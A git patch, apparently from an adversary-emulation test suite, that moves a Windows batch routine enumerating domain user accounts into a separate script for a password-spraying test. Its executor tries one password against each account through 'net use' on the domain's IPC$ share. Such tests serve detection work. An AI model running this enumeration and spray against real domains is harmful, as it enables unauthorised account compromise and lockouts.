From f4fa336bf77a1d896bf13645a2252926f91fcb74 Mon Sep 17 00:00:00 2001 From: clr2of8 Date: Thu, 25 Jun 2020 20:12:44 -0600 Subject: [PATCH] parse users script --- atomics/T1110.003/T1110.003.yaml | 7 +------ atomics/T1110.003/src/parse_net_users.bat | 6 ++++++ 2 files changed, 7 insertions(+), 6 deletions(-) create mode 100644 atomics/T1110.003/src/parse_net_users.bat diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml index 3f4db77c..bdf1e32a 100644 --- a/atomics/T1110.003/T1110.003.yaml +++ b/atomics/T1110.003/T1110.003.yaml @@ -23,12 +23,7 @@ atomic_tests: prereq_command: | if not exist %temp%\users.txt (exit /b 1) get_prereq_command: | - rem Create the users.txt by parsing the "net users /domain" output - del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1 - @FOR /F "skip=6 delims=" %a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%a & @call echo %^line: =,% >> %temp%\1.txt - @FOR /F "delims=" %a in (%temp%\1.txt) do @set line=%a & @call echo %^line:, =,% >> %temp%\2.txt - @FOR /F "tokens=1-3 delims=," %n in (%temp%\2.txt) do @echo %n >> %temp%\3.txt & @echo %o >> %temp%\3.txt & @echo %p >> %temp%\3.txt - @FOR /F "tokens=*" %a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %a >> %temp%\users.txt + PathToAtomicsFolder\T1110.003\src\parse_net_users.bat executor: command: |- @FOR /F %n in (%temp%\users.txt) do @echo | set/p=. & @net use %logonserver%\IPC$ /user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 & echo . && @echo [*] %n:#{password} && @net use /delete %logonserver%\IPC$ > NUL diff --git a/atomics/T1110.003/src/parse_net_users.bat b/atomics/T1110.003/src/parse_net_users.bat new file mode 100644 index 00000000..0eb52eb7 --- /dev/null +++ b/atomics/T1110.003/src/parse_net_users.bat @@ -0,0 +1,6 @@ +SETLOCAL EnableDelayedExpansion +del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1 +@FOR /F "skip=6 delims=" %%a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%%a & @call echo %%line: =,%% >> %temp%\1.txt +@FOR /F "delims=" %%a in (%temp%\1.txt) do @set line=%%a & @call echo %%line:, =,%% >> %temp%\2.txt +@FOR /F "tokens=1-3 delims=," %%n in (%temp%\2.txt) do @echo %%n >> %temp%\3.txt & @echo %%o >> %temp%\3.txt & @echo %%p >> %temp%\3.txt +@FOR /F "tokens=*" %%a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %%a >> %temp%\users.txt \ No newline at end of file